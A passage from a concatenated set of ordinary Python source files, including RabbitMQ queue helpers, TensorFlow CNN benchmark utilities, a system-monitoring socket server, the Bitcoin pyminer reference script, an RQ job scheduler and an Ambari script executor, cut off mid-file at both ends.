pass
def __init__(self, rmq_server_addr:str, port:int, username:str, request_pipe_name:str, response_pipe_name:str):
self._rmq_server_addr = rmq_server_addr
self._port=port
self._username=username
self._request_pipe_name = request_pipe_name
self._response_pipe_name = response_pipe_name
def listen(self, reset_pipe=False):
assert self.nr_threads is not None
if reset_pipe:
printgreen(info_prefix(),'Reset existing pipes.')
print('request_pipe_name:',self._request_pipe_name)
print('response_pipe_name:',self._response_pipe_name)
print()
self._clear_pipe(self._request_pipe_name)
self._clear_pipe(self._response_pipe_name)
threads = ThreadPool(self.nr_threads)
threads.map(self._listen_thread, range(self.nr_threads))
def _clear_pipe(self, pipe_name):
conn = pika.BlockingConnection(pika.ConnectionParameters(host=self._rmq_server_addr,port=self._port,heartbeat=self.heartbeat,blocked_connection_timeout=None,virtual_host='/',credentials=pika.PlainCredentials(self._username,self._username)))
channel = conn.channel()
channel.queue_delete(queue=pipe_name)
channel.close()
conn.close()
def _listen_thread(self, thread_idx):
conn = pika.BlockingConnection(pika.ConnectionParameters(host=self._rmq_server_addr,port=self._port,heartbeat=self.heartbeat,blocked_connection_timeout=None,virtual_host='/',credentials=pika.PlainCredentials(self._username,self._username)))
channel_request = conn.channel()
channel_request.queue_declare(queue=self._request_pipe_name)
channel_response = conn.channel()
channel_response.queue_declare(queue=self._response_pipe_name)
def fail(*args,**kwargs):
print('args:',args)
print('kwargs:',kwargs)
raise NotImplementedError
channel_response.add_on_cancel_callback(fail)
channel_request.basic_qos(prefetch_count=1)
channel_request.basic_consume(partial(self._request_callback, channel_response=channel_response), queue=self._request_pipe_name)
printgreen(info_prefix(),'Listening ({})'.format(thread_idx))
print()
channel_request.start_consuming()
def _request_callback(self, cur_channel, frame, properties, body, channel_response):
data = pickle.loads(body)
assert(len(data) == 2)
key = data[0]
content = data[1]
printgreen(info_prefix(),'receive key:',key)
print('content:',content)
print('waiting for evaluation...')
print()
try:
result = self.eval(content)
except:
import traceback
traceback.print_exc()
time.sleep(10)
os._exit(1)
print()
return {'status':'uncatched error'}
#assert isinstance(result,dict)
printgreen(info_prefix(),'finish key:',key)
print('content:',content)
print('result:',result)
print()
del content
obj = pickle.dumps((key, result))
if cur_channel.is_closed:
raise NotImplementedError
printgreen(info_prefix(),'return result')
channel_response.basic_publish(exchange='', routing_key=self._response_pipe_name, body=obj)
cur_channel.basic_ack(delivery_tag=frame.delivery_tag)
def run(self,threads,*,reset_pipe=False):
self.nr_threads=threads
self.listen(reset_pipe=reset_pipe)
class MessageQueueClientBase(metaclass=ABCMeta):
_rmq_server_addr = None
_username=None
_request_pipe_name = None
_response_pipe_name = None
_channel_request = None
_buffer = None
_buffer_queue = None
_data_idx = None
_thread=None
heartbeat=0
def __init__(self, rmq_server_addr:str, port:int, username:str, request_pipe_name:str, response_pipe_name:str):
self._rmq_server_addr = rmq_server_addr
self._port=port
self._username=username
self._request_pipe_name = request_pipe_name
self._response_pipe_name = response_pipe_name
self._buffer = dict()
self._buffer_queue = Queue()
self._data_idx = 0
def save(self):
return {'buffer':self._buffer}
def load(self,info):
self._buffer=info['buffer']
def connect(self, reset_pipe=False):
conn = pika.BlockingConnection(pika.ConnectionParameters(host=self._rmq_server_addr,port=self._port,heartbeat=self.heartbeat,blocked_connection_timeout=None,virtual_host='/',credentials=pika.PlainCredentials(self._username,self._username)))
self._conn=conn
self._channel_request = conn.channel()
if reset_pipe:
self._channel_request.queue_delete(queue=self._request_pipe_name)
self._channel_request.queue_declare(queue=self._request_pipe_name)
def start_consuming():
conn = pika.BlockingConnection(pika.ConnectionParameters(host=self._rmq_server_addr,port=self._port,heartbeat=self.heartbeat,blocked_connection_timeout=None,virtual_host='/',credentials=pika.PlainCredentials(self._username,self._username)))
channel_response = conn.channel()
if reset_pipe:
channel_response.queue_declare(queue=self._response_pipe_name)
channel_response.queue_declare(queue=self._response_pipe_name)
channel_response.basic_consume(self._fetch_response_callback, queue=self._response_pipe_name)
channel_response.start_consuming()
if self._thread is not None:
#self._thread._stop()
self._thread=None
thread = threading.Thread(target=start_consuming)
thread.start()
self._thread=thread
def _fetch_response_callback(self, cur_channel, frame, properties, body):
#print('callback')
data = pickle.loads(body)
assert len(data) == 2
printgreen(info_prefix(),'receive key:',data[0])
print('result:',data[1])
print()
#print(id(self),type(self))
self._buffer_queue.put(data)
cur_channel.basic_ack(delivery_tag=frame.delivery_tag)
@abstractmethod
def send(self, content, *,key:str=None) -> str:
self._data_idx += 1
key = key or "{}-{}".format(self._data_idx, time.time())
printgreen(info_prefix(),'send key',key)
print('content:',content)
print()
obj = pickle.dumps((key, content))
while True:
try:
self._channel_request.basic_publish(exchange='', routing_key=self._request_pipe_name, body=obj)
break
except:
import traceback
traceback.print_exc()
time.sleep(10)
print('Send failed, reconnecting >>>>>')
print('reconnect')
self.connect()
return key
def get(self, key:str, *, timeout) -> str:
printgreen(info_prefix(),'try to get key:',key)
if key in self._buffer:
data = self._buffer[key]
del self._buffer[key]
return data
#print ('buffer:',self._buffer)
#print(id(self),type(self))
begin_time=time.time()
while True:
#assert time.time()-begin_time<timeout
cur_key, content = self._buffer_queue.get(timeout=timeout)
#print('data:',cur_key,content)
if cur_key == key:
return content
else:
self._buffer[cur_key] = content
def get_retry(self,info,*,key,timeout):
while True:
try:
if key is None:
key=self.send(info)
print('new key')
res=self.get(key,timeout=timeout);
return res
except:
import traceback
traceback.print_exc()
time.sleep(1)
key=None
if __name__ == '__main__':
pass
|
cnn_util.py
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for CNN benchmarks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
import numpy as np
import tensorflow.compat.v1 as tf
def tensorflow_version_tuple():
v = tf.__version__
major, minor, patch = v.split('.')
return (int(major), int(minor), patch)
def tensorflow_version():
vt = tensorflow_version_tuple()
return vt[0] * 1000 + vt[1]
def log_fn(log):
print(log)
def roll_numpy_batches(array, batch_size, shift_ratio):
"""Moves a proportion of batches from start to the end of the array.
This function moves a proportion of batches, specified by `shift_ratio`, from
the starts of the array to the end. The number of batches moved is rounded
down to the nearest integer. For example,
```
roll_numpy_batches([1, 2, 3, 4, 5, 6], 2, 0.34) == [3, 4, 5, 6, 1, 2]
```
Args:
array: A Numpy array whose first dimension is the batch dimension.
batch_size: The batch size.
shift_ratio: Proportion of batches to move from the start of the array to
the end of the array.
Returns:
A new Numpy array, with a proportion of the batches at the start of `array`
moved to the end.
"""
num_items = array.shape[0]
assert num_items % batch_size == 0
num_batches = num_items // batch_size
starting_batch = int(num_batches * shift_ratio)
starting_item = starting_batch * batch_size
return np.roll(array, -starting_item, axis=0)
# For Python 2.7 compatibility, we do not use threading.Barrier.
class Barrier(object):
"""Implements a lightweight Barrier.
Useful for synchronizing a fixed number of threads at known synchronization
points. Threads block on 'wait()' and simultaneously return once they have
all made that call.
# Implementation adopted from boost/thread/barrier.hpp
"""
def __init__(self, parties):
"""Create a barrier, initialised to 'parties' threads."""
self.cond = threading.Condition(threading.Lock())
self.parties = parties
# Indicates the number of waiting parties.
self.waiting = 0
# generation is needed to deal with spurious wakeups. If self.cond.wait()
# wakes up for other reasons, generation will force it go back to wait().
self.generation = 0
self.broken = False
def wait(self):
"""Wait for the barrier."""
with self.cond:
# Check if the barrier has been disabled or not.
if self.broken:
return
gen = self.generation
self.waiting += 1
if self.waiting == self.parties:
self.waiting = 0
self.generation += 1
self.cond.notify_all()
# loop because of spurious wakeups
while gen == self.generation:
self.cond.wait()
# TODO(huangyp): Remove this method once we find a way to know which step
# is the last barrier.
def abort(self):
"""Clear existing barrier and disable this barrier."""
with self.cond:
if self.waiting > 0:
self.generation += 1
self.cond.notify_all()
self.broken = True
class ImageProducer(object):
"""An image producer that puts images into a staging area periodically.
This class is useful for periodically running a set of ops, `put_ops` on a
different thread every `batch_group_size` steps.
The notify_image_consumption() method is used to increment an internal counter
so that every `batch_group_size` times it is called, `put_ops` is executed. A
barrier is placed so that notify_image_consumption() will block until
the previous call to `put_ops` has been executed.
The start() method is used to start the thread that runs `put_ops`.
The done() method waits until the last put_ops is executed and stops the
thread.
The purpose of this class is to fill an image input pipeline every
`batch_group_size` steps. Suppose `put_ops` supplies `batch_group_size` images
to the input pipeline when run, and that every step, 1 batch of images is
consumed. Then, by calling notify_image_consumption() every step, images are
supplied to the input pipeline at the same amount they are consumed.
Example usage:
```
put_ops = ... # Enqueues `batch_group_size` batches to a StagingArea
get_op = ... # Dequeues 1 batch, and does some operations on it
batch_group_size = 4
with tf.Session() as sess:
image_producer = cnn_util.ImageProducer(sess, put_op, batch_group_size)
image_producer.start()
for _ in range(100):
sess.run(get_op)
image_producer.notify_image_consumption()
```
"""
def __init__(self, sess, put_ops, batch_group_size, use_python32_barrier):
self.sess = sess
self.num_gets = 0
self.put_ops = put_ops
self.batch_group_size = batch_group_size
self.done_event = threading.Event()
if (use_python32_barrier and
sys.version_info[0] == 3 and sys.version_info[1] >= 2):
self.put_barrier = threading.Barrier(2)
else:
self.put_barrier = Barrier(2)
def _should_put(self):
return (self.num_gets + 1) % self.batch_group_size == 0
def done(self):
"""Stop the image producer."""
self.done_event.set()
self.put_barrier.abort()
self.thread.join()
def start(self):
"""Start the image producer."""
self.sess.run([self.put_ops])
self.thread = threading.Thread(target=self._loop_producer)
# Set daemon to true to allow Ctrl + C to terminate all threads.
self.thread.daemon = True
self.thread.start()
def notify_image_consumption(self):
"""Increment the counter of image_producer by 1.
This should only be called by the main thread that consumes images and runs
the model computation. One batch of images should be consumed between
calling start() and the first call to this method. Then, one batch of images
should be consumed between any two successive calls to this method.
"""
if self._should_put():
self.put_barrier.wait()
self.num_gets += 1
def _loop_producer(self):
while not self.done_event.isSet():
self.sess.run([self.put_ops])
self.put_barrier.wait()
class BaseClusterManager(object):
"""The manager for the cluster of servers running the benchmark."""
def __init__(self, params):
worker_hosts = params.worker_hosts.split(',')
ps_hosts = params.ps_hosts.split(',') if params.ps_hosts else []
cluster = {'worker': worker_hosts}
if ps_hosts:
cluster['ps'] = ps_hosts
self._cluster_spec = tf.train.ClusterSpec(cluster)
def get_target(self):
"""Returns a target to be passed to tf.Session()."""
raise NotImplementedError('get_target must be implemented by subclass')
def join_server(self):
raise NotImplementedError('join must be implemented by subclass')
def get_cluster_spec(self):
return self._cluster_spec
def num_workers(self):
return len(self._cluster_spec.job_tasks('worker'))
def num_ps(self):
if 'ps' in self._cluster_spec.jobs:
return len(self._cluster_spec.job_tasks('ps'))
else:
return 0
class GrpcClusterManager(BaseClusterManager):
"""A cluster manager for a cluster networked with gRPC."""
def __init__(self, params, config_proto):
super(GrpcClusterManager, self).__init__(params)
if params.job_name == 'controller':
self._target = 'grpc://%s' % self._cluster_spec.job_tasks('worker')[0]
else:
self._server = tf.train.Server(self._cluster_spec,
job_name=params.job_name,
task_index=params.task_index,
config=config_proto,
protocol=params.server_protocol)
self._target = self._server.target
def get_target(self):
return self._target
def join_server(self):
return self._server.join()
|
server.py
|
import os, struct, time, json
import socket, shutil
import psutil
from threading import Thread, Lock
with open('/etc/system_monitor.json', 'r') as f:
config = json.loads(f.read())
# ===============================================
# Utility functions to enumerate disks,
# mounted file systems etc
# ===============================================
# ===============================================
def get_physical_disks():
data = os.popen('lsblk --json').read()
res = json.loads(data)
all_devices = res['blockdevices']
devices = []
for dev in all_devices:
if dev['name'][0:4] == 'nvme' or dev['name'][0:2] == 'sd':
devices.append(dev['name'])
return devices
# ===============================================
def get_smart_status(block_device_name):
# -------------------
cmd = 'smartctl -json -H -A /dev/' + block_device_name
data = os.popen(cmd).read()
res = json.loads(data)
value = {'passed' : res['smart_status']['passed']}
if "ata_smart_attributes" in res:
result = {}
for item in res["ata_smart_attributes"]["table"]:
result[item['name']] = item['raw']['string']
value['attrs'] = result
elif "nvme_smart_health_information_log" in res:
value['attrs'] = res["nvme_smart_health_information_log"]
return value
# ===============================================
def get_file_systems():
file_systems = []
for part in psutil.disk_partitions():
if '/snap' not in part.mountpoint:
file_systems.append(part.mountpoint)
return file_systems
# ===============================================
# All of the system monitoring runs in
# independent threads so they can be updated
# at different time intervals.
# ===============================================
data_cache = {}
threadLock = Lock()
# ===============================================
def update_smart_data(check_interval):
global threadLock, data_cache
physical_disks = get_physical_disks()
while True:
print('update smart data')
output = {}
for disk in physical_disks:
output[disk] = get_smart_status(disk)
threadLock.acquire()
data_cache['smart_data'] = output
threadLock.release()
time.sleep(check_interval)
# ===============================================
def update_file_system_utilisation(check_interval):
global threadLock, data_cache
file_systems = get_file_systems()
while True:
output = {}
for file_system in file_systems:
usage = shutil.disk_usage(file_system)
output[file_system] = usage.used / usage.total
threadLock.acquire()
data_cache['disk_use'] = output
threadLock.release()
time.sleep(check_interval)
# ===============================================
def update_memory_use(check_interval):
global threadLock, data_cache
while True:
# Memory
mem = psutil.virtual_memory()
threadLock.acquire()
data_cache['memory'] = {
'available' : mem.total,
'used' : mem.used
}
threadLock.release()
time.sleep(check_interval)
# ===============================================
def update_cpu_use(check_interval):
global threadLock, data_cache
while True:
cpu_use = psutil.cpu_percent(interval=check_interval, percpu=True)
threadLock.acquire()
data_cache['cpu'] = cpu_use
threadLock.release()
# ===============================================
network_recv_last = None
network_sent_last = None
def update_network_use(check_interval):
global threadLock, data_cache, network_recv_last, network_sent_last
while True:
network = psutil.net_io_counters(pernic=False)
if network_recv_last == None:
network_recv_last = network.bytes_recv
network_sent_last = network.bytes_sent
recv = network.bytes_recv - network_recv_last
sent = network.bytes_sent - network_sent_last
threadLock.acquire()
data_cache['network'] = {
'sent' : sent / 1024,
'recv' : recv / 1024,
}
threadLock.release()
network_recv_last = network.bytes_recv
network_sent_last = network.bytes_sent
time.sleep(check_interval)
# ===============================================
# Server connection handler
# ===============================================
pool = []
if 'smart_data' in config['check']:
pool.append(
Thread(target=update_smart_data,
args=(config['check']['smart_data'],)))
if 'file_system_utilisation' in config['check']:
pool.append(
Thread(target=update_file_system_utilisation,
args=(config['check']['file_system_utilisation'],)))
if 'memory_use' in config['check']:
pool.append(
Thread(target=update_memory_use,
args=(config['check']['memory_use'],)))
if 'cpu_use' in config['check']:
pool.append(
Thread(target=update_cpu_use,
args=(config['check']['cpu_use'],)))
if 'network_use' in config['check']:
pool.append(
Thread(target=update_network_use,
args=(config['check']['network_use'],)))
[t.start() for t in pool]
# =================================================
# =================================================
def conection_handler(c, addr):
while True:
threadLock.acquire()
data = json.dumps(data_cache).encode()
threadLock.release()
c.send(struct.pack("!i", len(data)))
c.send(data)
time.sleep(config['send_frequency'])
# =================================================
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((config['bind_address'], config['bind_port']))
s.listen(5)
while True:
c, addr = s.accept()
c.settimeout(60)
t = Thread(target = conection_handler,args = (c,addr))
pool.append(t)
t.start()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file license.txt or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 24543
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
scheduler.py
|
import logging
import os
import signal
import time
import traceback
from datetime import datetime
from multiprocessing import Process
from redis import Redis, SSLConnection
from .defaults import DEFAULT_LOGGING_DATE_FORMAT, DEFAULT_LOGGING_FORMAT
from .job import Job
from .logutils import setup_loghandlers
from .queue import Queue
from .registry import ScheduledJobRegistry
from .utils import current_timestamp, enum
SCHEDULER_KEY_TEMPLATE = 'rq:scheduler:%s'
SCHEDULER_LOCKING_KEY_TEMPLATE = 'rq:scheduler-lock:%s'
class RQScheduler(object):
# STARTED: scheduler has been started but sleeping
# WORKING: scheduler is in the midst of scheduling jobs
# STOPPED: scheduler is in stopped condition
Status = enum(
'SchedulerStatus',
STARTED='started',
WORKING='working',
STOPPED='stopped'
)
def __init__(self, queues, connection, interval=1, logging_level=logging.INFO,
date_format=DEFAULT_LOGGING_DATE_FORMAT,
log_format=DEFAULT_LOGGING_FORMAT):
self._queue_names = set(parse_names(queues))
self._acquired_locks = set()
self._scheduled_job_registries = []
self.lock_acquisition_time = None
# Copy the connection kwargs before mutating them in order to not change the arguments
# used by the current connection pool to create new connections
self._connection_kwargs = connection.connection_pool.connection_kwargs.copy()
# Redis does not accept parser_class argument which is sometimes present
# on connection_pool kwargs, for example when hiredis is used
self._connection_kwargs.pop('parser_class', None)
self._connection_class = connection.__class__ # client
connection_class = connection.connection_pool.connection_class
if issubclass(connection_class, SSLConnection):
self._connection_kwargs['ssl'] = True
self._connection = None
self.interval = interval
self._stop_requested = False
self._status = self.Status.STOPPED
self._process = None
self.log = logging.getLogger(__name__)
setup_loghandlers(
level=logging_level,
name=__name__,
log_format=log_format,
date_format=date_format,
)
@property
def connection(self):
if self._connection:
return self._connection
self._connection = self._connection_class(**self._connection_kwargs)
return self._connection
@property
def acquired_locks(self):
return self._acquired_locks
@property
def status(self):
return self._status
@property
def should_reacquire_locks(self):
"""Returns True if lock_acquisition_time is longer than 10 minutes ago"""
if self._queue_names == self.acquired_locks:
return False
if not self.lock_acquisition_time:
return True
return (datetime.now() - self.lock_acquisition_time).total_seconds() > 600
def acquire_locks(self, auto_start=False):
"""Returns names of queue it successfully acquires lock on"""
successful_locks = set()
pid = os.getpid()
self.log.info("Trying to acquire locks for %s", ", ".join(self._queue_names))
for name in self._queue_names:
if self.connection.set(self.get_locking_key(name), pid, nx=True, ex=60):
successful_locks.add(name)
# Always reset _scheduled_job_registries when acquiring locks
self._scheduled_job_registries = []
self._acquired_locks = self._acquired_locks.union(successful_locks)
self.lock_acquisition_time = datetime.now()
# If auto_start is requested and scheduler is not started,
# run self.start()
if self._acquired_locks and auto_start:
if not self._process:
self.start()
return successful_locks
def prepare_registries(self, queue_names=None):
"""Prepare scheduled job registries for use"""
self._scheduled_job_registries = []
if not queue_names:
queue_names = self._acquired_locks
for name in queue_names:
self._scheduled_job_registries.append(
ScheduledJobRegistry(name, connection=self.connection)
)
@classmethod
def get_locking_key(cls, name):
"""Returns scheduler key for a given queue name"""
return SCHEDULER_LOCKING_KEY_TEMPLATE % name
def enqueue_scheduled_jobs(self):
"""Enqueue jobs whose timestamp is in the past"""
self._status = self.Status.WORKING
if not self._scheduled_job_registries and self._acquired_locks:
self.prepare_registries()
for registry in self._scheduled_job_registries:
timestamp = current_timestamp()
# TODO: try to use Lua script to make get_jobs_to_schedule()
# and remove_jobs() atomic
job_ids = registry.get_jobs_to_schedule(timestamp)
if not job_ids:
continue
queue = Queue(registry.name, connection=self.connection)
with self.connection.pipeline() as pipeline:
jobs = Job.fetch_many(job_ids, connection=self.connection)
for job in jobs:
if job is not None:
queue.enqueue_job(job, pipeline=pipeline)
registry.remove(job, pipeline=pipeline)
pipeline.execute()
self._status = self.Status.STARTED
def _install_signal_handlers(self):
"""Installs signal handlers for handling SIGINT and SIGTERM
gracefully.
"""
signal.signal(signal.SIGINT, self.request_stop)
signal.signal(signal.SIGTERM, self.request_stop)
def request_stop(self, signum=None, frame=None):
"""Toggle self._stop_requested that's checked on every loop"""
self._stop_requested = True
def heartbeat(self):
"""Updates the TTL on scheduler keys and the locks"""
self.log.debug("Scheduler sending heartbeat to %s",
", ".join(self.acquired_locks))
if len(self._queue_names) > 1:
with self.connection.pipeline() as pipeline:
for name in self._queue_names:
key = self.get_locking_key(name)
pipeline.expire(key, self.interval + 5)
pipeline.execute()
else:
key = self.get_locking_key(next(iter(self._queue_names)))
self.connection.expire(key, self.interval + 5)
def stop(self):
self.log.info("Scheduler stopping, releasing locks for %s...",
','.join(self._queue_names))
self.release_locks()
self._status = self.Status.STOPPED
def release_locks(self):
"""Release acquired locks"""
keys = [self.get_locking_key(name) for name in self._queue_names]
self.connection.delete(*keys)
self._acquired_locks = set()
def start(self):
self._status = self.Status.STARTED
# Redis instance can't be pickled across processes so we need to
# clean this up before forking
self._connection = None
self._process = Process(target=run, args=(self,), name='Scheduler')
self._process.start()
return self._process
def work(self):
self._install_signal_handlers()
while True:
if self._stop_requested:
self.stop()
break
if self.should_reacquire_locks:
self.acquire_locks()
self.enqueue_scheduled_jobs()
self.heartbeat()
time.sleep(self.interval)
def run(scheduler):
scheduler.log.info("Scheduler for %s started with PID %s",
','.join(scheduler._queue_names), os.getpid())
try:
scheduler.work()
except: # noqa
scheduler.log.error(
'Scheduler [PID %s] raised an exception.\n%s',
os.getpid(), traceback.format_exc()
)
raise
scheduler.log.info("Scheduler with PID %s has stopped", os.getpid())
def parse_names(queues_or_names):
"""Given a list of strings or queues, returns queue names"""
names = []
for queue_or_name in queues_or_names:
if isinstance(queue_or_name, Queue):
names.append(queue_or_name.name)
else:
names.append(str(queue_or_name))
return names
|
PythonExecutor.py
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import logging
import os
import subprocess
import pprint
import threading
from threading import Thread
from Grep import Grep
import shell
import sys
import platform
import Constants
logger = logging.getLogger()
class PythonExecutor:
"""
Performs functionality for executing python scripts.
Warning: class maintains internal state. As a result, instances should not be
used as a singleton for a concurrent execution of python scripts
"""
NO_ERROR = "none"
grep = Grep()
event = threading.Event()
python_process_has_been_killed = False
def __init__(self, tmpDir, config):
self.tmpDir = tmpDir
self.config = config
pass
def run_file(self, script, script_params, tmpoutfile, tmperrfile, timeout,
tmpstructedoutfile, logger_level, override_output_files=True,
environment_vars=None):
"""
Executes the specified python file in a separate subprocess.
Method returns only when the subprocess is finished.
Params arg is a list of script parameters
Timeout meaning: how many seconds should pass before script execution
is forcibly terminated
override_output_files option defines whether stdout/stderr files will be
recreated or appended
"""
if override_output_files: # Recreate files
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
else: # Append to files
tmpout = open(tmpoutfile, 'a')
tmperr = open(tmperrfile, 'a')
# need to remove this file for the following case:
# status call 1 does not write to file; call 2 writes to file;
# call 3 does not write to file, so contents are still call 2's result
try:
os.unlink(tmpstructedoutfile)
except OSError:
pass # no error
script_params += [tmpstructedoutfile, logger_level]
pythonCommand = self.python_command(script, script_params)
logger.info("Running command " + pprint.pformat(pythonCommand))
process = self.launch_python_subprocess(pythonCommand, tmpout, tmperr,
environment_vars)
logger.debug("Launching watchdog thread")
self.event.clear()
self.python_process_has_been_killed = False
thread = Thread(target=self.python_watchdog_func, args=(process, timeout))
thread.start()
# Waiting for the process to be either finished or killed
process.communicate()
self.event.set()
thread.join()
# Building results
error = self.NO_ERROR
returncode = process.returncode
out = open(tmpoutfile, 'r').read()
error = open(tmperrfile, 'r').read()
try:
with open(tmpstructedoutfile, 'r') as fp:
structured_out = json.load(fp)
except Exception:
if os.path.exists(tmpstructedoutfile):
errMsg = 'Unable to read structured output from ' + tmpstructedoutfile
structured_out = {
'msg': errMsg
}
logger.warn(structured_out)
else:
structured_out = {}
if self.python_process_has_been_killed:
error = str(error) + "\n Python script has been killed due to timeout"
returncode = 999
result = self.condenseOutput(out, error, returncode, structured_out)
logger.info("Result: %s" % result)
return result
def launch_python_subprocess(self, command, tmpout, tmperr,
environment_vars=None):
"""
Creates subprocess with given parameters. This functionality was moved to separate method
to make possible unit testing
"""
close_fds = None if platform.system() == "Windows" else True
env = os.environ.copy()
if environment_vars:
for k, v in environment_vars:
logger.info("Setting env: %s to %s", k, v)
env[k] = v
return subprocess.Popen(command,
stdout=tmpout,
stderr=tmperr, close_fds=close_fds, env=env)
def isSuccessfull(self, returncode):
return not self.python_process_has_been_killed and returncode == 0
def python_command(self, script, script_params):
